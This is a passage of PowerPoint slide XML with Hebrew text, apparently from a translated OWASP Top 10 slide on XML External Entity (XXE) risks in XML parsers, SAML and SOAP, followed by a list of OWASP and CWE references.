              <a:t>, אשר בשלב מאוחר יותר עוברים תהליכי </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>parsing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> ע"י רכיב תרגום ה-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>כלל מתרגמי ה-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> ברמת היישום או </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>web services</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> מבוססי </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SOAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> מכילים הגדרה </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>document type definitions (DTDs)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> במצב מופעל. בשל העובדה שביטול מנגנון ה-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DTD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> משתנה בין רכיבי התרגום, מומלץ לקרוא את המסמך </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet 'XXE Prevention’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>במידה והיישום שלך משתמש ב-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SAML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> לטובת ניהול זהויות מבוסס </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>federated security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> או </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>single sign on (SSO)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SAML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> משתמש ב-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> עבור תהליך האימות והוא עשוי להיות פגיע.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>במידה והיישום משתמש ב-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SOAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> בגרסאות ישנות יותר מגרסה 1.2, הוא עשוי להיות פגיע למתקפות </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> במידה וישויות ה-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> מועברות למסגרת העבודה של ה-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SOAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>להיות פגיע למתקפות </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> פירושו שהיישום פגיע למתקפות מניעת שירות לרבות מתקפת </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Billion Laughs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId6"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="Rectangle 136"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8620" y="6372200"/>
            <a:ext cx="3383280" cy="2761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gn="r" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="1100" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>הפניות</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>OWASP Application Security Verification Standard</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>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buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>OWASP Testing Guide: Testing for XML Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>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buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>OWASP XXE Vulnerability</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>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buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet: XXE Prevention</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>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buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet: XML Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>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pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="1100" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>הפניות חיצוניות</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId11"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>CWE-611: Improper Restriction of XXE</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>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buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>Billion Laughs Attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>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buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>SAML Security XML External Entity Attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>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buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
